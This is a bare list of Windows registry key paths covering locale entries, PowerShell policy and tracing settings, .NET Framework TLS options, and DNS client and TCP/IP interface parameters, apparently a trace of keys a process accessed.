HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ug-CN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\mi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\mi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\mi-NZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\mi-NZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\oc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\oc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\oc-FR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\oc-FR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\co
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\co
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\co-FR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\co-FR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\gsw
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\gsw
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\gsw-FR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\gsw-FR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sah
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sah
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sah-RU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sah-RU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\qut
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\qut
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\qut-GT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\qut-GT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\rw
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\rw
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\rw-RW
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\rw-RW
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\wo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\wo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\wo-SN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\wo-SN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\prs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\prs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\prs-AF
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\prs-AF
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\gd
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\gd
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\gd-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\gd-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\zh-TW
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\zh-TW
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\es-ES_tradnl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\es-ES_tradnl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\iu-Cans-CA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\iu-Cans-CA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\qps-ploc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\qps-ploc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000501
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\Alternate Sorts\00000501
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\qps-ploca
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\qps-ploca
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\000005FE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\Alternate Sorts\000005FE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ar-IQ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ar-IQ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\de-CH
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\de-CH
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\es-MX
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\es-MX
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fr-BE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fr-BE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-CH
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-CH
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\nl-BE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\nl-BE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\nn-NO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\nn-NO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\pt-PT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\pt-PT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sr-Latn-CS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sr-Latn-CS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sv-FI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sv-FI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\az-Cyrl-AZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\az-Cyrl-AZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\dsb-DE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\dsb-DE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\se-SE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\se-SE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ms-BN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ms-BN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\uz-Cyrl-UZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\uz-Cyrl-UZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\bn-BD
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\bn-BD
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\mn-Mong-CN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\mn-Mong-CN
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\quz-EC
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\quz-EC
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\qps-plocm
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\qps-plocm
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment\__PSLockdownPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\PipelineMaxStackSizeMB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\DefaultAccessPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging\EnableScriptBlockLogging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallationType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\HWRPortReuseOnSocketBind
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\UseHttpPipeliningAndBufferPooling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\UseSafeSynchronousClose
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\UseStrictRfcInterimResponseHandling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\AllowDangerousUnicodeDecompositions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\UseStrictIPv6AddressParsing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\AllowAllUriEncodingExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\SchUseStrongCrypto
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\SchSendAuxRecord
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\SystemDefaultTlsVersions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\RequireCertificateEKUs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\LegacyWPADSupport
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\MaximumAllowedAllocationSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DomainNameDevolutionLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DomainNameDevolutionLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\PrioritizeRecordData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\PrioritizeRecordData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\PrioritizeRecordData
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AppendToMultiLabelName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AppendToMultiLabelName
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenBadTlds
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenBadTlds
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenUnreachableServers
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenUnreachableServers
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenDefaultServers
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenDefaultServers
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DynamicServerQueryOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DynamicServerQueryOrder
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\FilterClusterIp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\FilterClusterIp
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\WaitForNameErrorOnAll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\WaitForNameErrorOnAll
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseEdns
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseEdns
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DnsSecureNameQueryFallback
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsSecureNameQueryFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableDAForAllNetworks
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\EnableDAForAllNetworks
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DirectAccessQueryOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DirectAccessQueryOrder
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\QueryIpMatching
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\QueryIpMatching
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseHostsFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseHostsFile
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AddrConfigControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AddrConfigControl
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableDynamicUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterPrimaryName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterPrimaryName
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterReverseLookup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterReverseLookup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableReverseAddressRegistrations
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterWanAdapters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterWanAdapters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableWanDynamicUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DefaultRegistrationTTL
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DefaultRegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UpdateTopLevelDomainZones
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UpdateTopLevelDomainZones
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DowncaseSpnCauseApiOwnerIsTooLazy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DowncaseSpnCauseApiOwnerIsTooLazy
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationOverwrite
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationOverwrite
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCacheTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCacheTtl
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxNegativeCacheTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxNegativeCacheTtl
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AdapterTimeoutLimit
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AdapterTimeoutLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ServerPriorityTimeLimit
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ServerPriorityTimeLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCachedSockets
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCachedSockets
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableMulticast
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastResponderFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastResponderFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastSenderFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastSenderFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastSenderMaxTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastSenderMaxTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsTest
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseCompartments
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\CacheAllCompartments
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseNewRegistration
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ResolverRegistration
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ResolverRegistrationOnly
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsQueryTimeouts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DnsQueryTimeouts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsQuickQueryTimeouts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DnsQuickQueryTimeouts
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\PrimaryDomainName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AdapterDomainName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{0DC265B0-22BB-41D7-A076-B51C28A4C40D}\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{0DC265B0-22BB-41D7-A076-B51C28A4C40D}\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{0DC265B0-22BB-41D7-A076-B51C28A4C40D}\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{0DC265B0-22BB-41D7-A076-B51C28A4C40D}\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{0DC265B0-22BB-41D7-A076-B51C28A4C40D}\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{0DC265B0-22BB-41D7-A076-B51C28A4C40D}\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{0DC265B0-22BB-41D7-A076-B51C28A4C40D}\Domain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{0DC265B0-22BB-41D7-A076-B51C28A4C40D}\DhcpDomain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{50AD0A0A-0497-4CB4-8676-C51D89C211F8}\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{50AD0A0A-0497-4CB4-8676-C51D89C211F8}\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{50AD0A0A-0497-4CB4-8676-C51D89C211F8}\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{50AD0A0A-0497-4CB4-8676-C51D89C211F8}\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{50AD0A0A-0497-4CB4-8676-C51D89C211F8}\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{50AD0A0A-0497-4CB4-8676-C51D89C211F8}\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{50AD0A0A-0497-4CB4-8676-C51D89C211F8}\Domain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{50AD0A0A-0497-4CB4-8676-C51D89C211F8}\DhcpDomain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{e29ac6c2-7037-11de-816d-806e6f6e6963}\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{e29ac6c2-7037-11de-816d-806e6f6e6963}\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{e29ac6c2-7037-11de-816d-806e6f6e6963}\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{e29ac6c2-7037-11de-816d-806e6f6e6963}\DisableDynamicUpdate
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{e29ac6c2-7037-11de-816d-806e6f6e6963}\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{e29ac6c2-7037-11de-816d-806e6f6e6963}\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{e29ac6c2-7037-11de-816d-806e6f6e6963}\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{e29ac6c2-7037-11de-816d-806e6f6e6963}\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{e29ac6c2-7037-11de-816d-806e6f6e6963}\Domain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{e29ac6c2-7037-11de-816d-806e6f6e6963}\DhcpDomain
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\SearchList
